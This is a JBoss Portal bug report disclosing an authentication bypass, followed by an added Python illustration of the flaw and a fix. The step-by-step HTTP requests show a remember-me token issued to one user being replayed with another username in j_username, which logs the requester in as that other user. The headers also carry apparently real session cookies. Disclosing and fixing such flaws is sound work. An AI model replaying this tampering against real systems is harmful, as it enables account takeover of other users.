Wells guo created JBPORTAL-2496:
-----------------------------------
Summary: bypass authentication
Key: JBPORTAL-2496
URL:
https://issues.jboss.org/browse/JBPORTAL-2496
Project: JBoss Portal
Issue Type: Bug
Security Level: Public (Everyone can see)
Environment: EPP 5.1.0
Reporter: Wells guo
Steps to Reproduce:
1. Log into our portal project with a correct username and password
POST /portal/login HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXXX/home?portal:componentId=UIPortal&portal:action=Logout
Cookie: s_vi=[CS]v1|28EA91FC051D0C67-6000012D0022FE71[CE]; LOCALE=en;
__utma=185718442.2127140870.1375753347.1375949446.1375956336.6;
__utmz=185718442.1375753347.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
rh_omni_tc=70160000000H4AoAAK; __utmc=185718442; s_cc=true; s_sq=%5B%5BB%5D%5D;
JSESSIONID=OWtMF08HGwjlkDYd+ocNFA__; s_fid=5E3538E66F23E79E-217322C448997A94;
s_ria=flash%2011%7Csilverlight%20not%20detected; s_nr=1376462032265;
s_vnum=1379054032265%26vn%3D1; rh_elqCustomerGUID=c93529bc-f6c8-4a28-b8b1-59e8152d01ff
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
initialURI=%2Fportal%2Fprivate%2Fxxxx0%2Fhome&username=userA&password=xxxx
2. Get a 302 response and open the /portal/private/project/home page
HTTP/1.1 302 Moved Temporarily
Date: Thu, 15 Aug 2013 07:19:48 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Location: http://XXXX//home
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8
GET /portal/private/xxxx/home HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXXX//home?portal:componentId=UIPortal&portal:action=Logout
Cookie: s_vi=[CS]v1|28EA91FC051D0C67-6000012D0022FE71[CE]; LOCALE=en;
__utma=185718442.2127140870.1375753347.1375949446.1375956336.6;
__utmz=185718442.1375753347.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
rh_omni_tc=70160000000H4AoAAK; __utmc=185718442; s_cc=true; s_sq=%5B%5BB%5D%5D;
JSESSIONID=OWtMF08HGwjlkDYd+ocNFA__; s_fid=5E3538E66F23E79E-217322C448997A94;
s_ria=flash%2011%7Csilverlight%20not%20detected; s_nr=1376462032265;
s_vnum=1379054032265%26vn%3D1; rh_elqCustomerGUID=c93529bc-f6c8-4a28-b8b1-59e8152d01ff
Connection: keep-alive
3. Get a 302 response again, which redirects to the security check page with the username; modify the username to someone else who is logged in.
Original message:
HTTP/1.1 302 Moved Temporarily
Date: Thu, 15 Aug 2013 07:29:42 GMT
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 19:00:00 EST
Location: http://XXXX//portal/private/xxxx/j_security_check?j_username=userA&j_password=rememberme1447024746
^^^^^^^^^^^^^^^^^
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Modified message:
HTTP/1.1 302 Moved Temporarily
Date: Thu, 15 Aug 2013 07:29:42 GMT
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 19:00:00 EST
Location: http://XXXX//portal/private/xxxx/j_security_check?j_username=userB&j_...
^^^^^^^^^^^^^^^^
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
4. Send a GET request for the page in the "Location" header of step 3, which carries the username "userB"
GET /portal/private/xxx/j_security_check?j_username=userB&j_password=rememberme1447024746 HTTP/1.1
^^^^^^^^^^^^^^^^^^
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXXX/portal/private/xxxx/home?portal:componentId=UIPortal&port...
Cookie: s_vi=[CS]v1|28EA91FC051D0C67-6000012D0022FE71[CE]; LOCALE=en;
__utma=185718442.2127140870.1375753347.1375949446.1375956336.6;
__utmz=185718442.1375753347.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
rh_omni_tc=70160000000H4AoAAK; __utmc=185718442; s_cc=true; s_sq=%5B%5BB%5D%5D;
JSESSIONID=OWtMF08HGwjlkDYd+ocNFA__; s_fid=5E3538E66F23E79E-217322C448997A94;
s_ria=flash%2011%7Csilverlight%20not%20detected; s_nr=1376462032265;
s_vnum=1379054032265%26vn%3D1; rh_elqCustomerGUID=c93529bc-f6c8-4a28-b8b1-59e8152d01ff
Connection: keep-alive
5. Get a 302 response that redirects to the home page (attachment1).
6. Click the Content tab on the home page; it now shows that you are logged in as "userB", and operations can be performed as userB too.
Actual results:
Authentication bypassed successfully.
Expected results:
Should not log into the project with "userB" successfully.
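The steps above show a remember-me style credential (the j_password value) being accepted together with a j_username it was not issued for, so the server logs the caller in as whatever name the request carries. The following Python is an added illustration of that fault and of the usual fix; it is not part of this report and not JBoss Portal / EPP code, and it assumes a simple design in which the server MACs the token over the username it was issued for, so that the same token presented with a different j_username fails verification. The `weak_login` function is a constructed model of the observed behaviour (any issued token accepted, identity taken from the parameter), not a claim about how EPP implements it.

```python
"""Remember-me token handling: a parameter-trusting check beside a user-bound one.

Added example, not JBoss Portal / EPP code. The token format, the server key
and the login functions are all assumptions made for illustration.
"""
import hashlib
import hmac
import secrets
import time
from typing import Optional, Set, Tuple

# Assumption: a per-deployment secret held only by the server.
SERVER_KEY = secrets.token_bytes(32)


def _payload(username: str, expiry: int, nonce: str) -> bytes:
    # Length-prefix the username so the username/expiry boundary is never ambiguous.
    return f"{len(username)}:{username}:{expiry}:{nonce}".encode()


def issue_token(username: str, ttl_seconds: int, now: Optional[float] = None) -> str:
    """Issue a token whose MAC covers the username it was issued for."""
    expiry = int((time.time() if now is None else now) + ttl_seconds)
    nonce = secrets.token_hex(8)
    mac = hmac.new(SERVER_KEY, _payload(username, expiry, nonce), hashlib.sha256).hexdigest()
    return f"{expiry}.{nonce}.{mac}"


def weak_login(j_username: str, j_password: str, issued: Set[str]) -> Optional[str]:
    """Constructed model of the behaviour in the report: any token the server
    has issued is accepted, and the caller's j_username is taken as the
    identity to log in as. Returns the resulting identity or None."""
    if j_password in issued:
        return j_username
    return None


def bound_login(j_username: str, j_password: str, now: Optional[float] = None) -> Optional[str]:
    """Accept the token only if its MAC was computed over j_username and it
    has not expired. Returns the authenticated identity or None."""
    try:
        expiry_s, nonce, mac = j_password.split(".")
        expiry = int(expiry_s)
    except ValueError:
        return None  # malformed token
    if (time.time() if now is None else now) > expiry:
        return None  # expired
    expected = hmac.new(SERVER_KEY, _payload(j_username, expiry, nonce), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, mac):
        return None  # token was not issued for this username (or was tampered with)
    return j_username


def demo() -> Tuple[Optional[str], Optional[str], Optional[str]]:
    """Replay steps 3/4 of the report against both checks: a token issued to
    userA is presented with j_username=userB. Timestamps are constructed."""
    issued: Set[str] = set()
    token_a = issue_token("userA", ttl_seconds=3600, now=1_376_462_032)
    issued.add(token_a)
    return (
        weak_login("userB", token_a, issued),              # 'userB': parameter trusted
        bound_login("userB", token_a, now=1_376_462_100),  # None: MAC does not cover userB
        bound_login("userA", token_a, now=1_376_462_100),  # 'userA': legitimate use
    )


if __name__ == "__main__":
    print(demo())
```

The point of `bound_login` is that the identity is derived from what the server signed, not from a caller-supplied parameter; an equivalent fix with an opaque token stored server-side is to look up the user the token was issued to and ignore j_username entirely. Either way the rest of the flow (session fixation checks, expiry, revocation on logout) still applies.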